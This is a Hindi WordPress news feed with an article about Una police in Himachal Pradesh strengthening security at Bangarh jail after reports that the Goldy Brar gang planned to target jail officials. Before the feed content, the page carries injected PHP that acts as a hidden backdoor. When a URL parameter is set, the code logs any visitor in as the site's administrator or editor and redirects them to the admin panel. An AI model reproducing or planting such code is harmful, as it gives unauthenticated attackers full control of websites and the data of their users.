// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); gangster’s gang – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 10 Jul 2024 21:57:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 गैंगस्टर गोल्डी बराड़ के गैंग से जुड़े गुर्गों से मिली इनपुट के आधार पर जिला ऊना पुलिस सतर्क https://pratyushaashakinayikiran.com/?p=50070 Wed, 10 Jul 2024 21:57:00 +0000 https://pratyushaashakinayikiran.com/?p=50070 ऊना
हिमाचल प्रदेश के ऊना जिला में स्थित बनगढ़ जेल के अधिकारियों के खिलाफ आपराधिक गतिविधियों को अंजाम देने की गैंगस्टर गोल्डी बराड़ के गैंग से जुड़े गुर्गों से मिली इनपुट के आधार पर जिला ऊना पुलिस सतर्क हो गई है। जेल में सख्ती होने के कारण अधिकारियों को निशाना बनाने की बात पंजाब पुलिस के मार्फत हिमाचल पुलिस को देर शाम मिली जिसके बाद जिला पुलिस प्रशासन सतर्क हो गया और तुरंत जेल का जायजा लिया। जेल की सुरक्षा को बढ़ाया गया और अंदर छानबीन कर सुरक्षा व्यवस्था को चुस्त-दुरुस्त किया गया।

गौरतलब है कि इस वक्त ऊना के जिला कारागार में पंजाब के कई गैंगस्टर विभिन्न मामलों में आरोपी के तौर पर बंद हैं, जिनका ट्रायल विभिन्न अदालतों में चल रहा है। पंजाब पुलिस की पकड़ में आए कुछ गैंगस्टरों ने पूछताछ के दौरान खुलासा किया था कि बनगढ़ जेल के अधिकारियों को भी निशाना बनाने की योजना चल रही थी, जिसके बाद पंजाब पुलिस ने हिमाचल पुलिस को इस बाबत सूचित किया था और हिमाचल की ऊना पुलिस ने इस पर त्वरित कार्रवाई करते हुए सुरक्षा व्यवस्था को पुख्ता किया है। एसपी राकेश सिंह ने बताया कि सूचना के आधार पर जिला कारागार की सुरक्षा बढ़ाई गई है।

]]>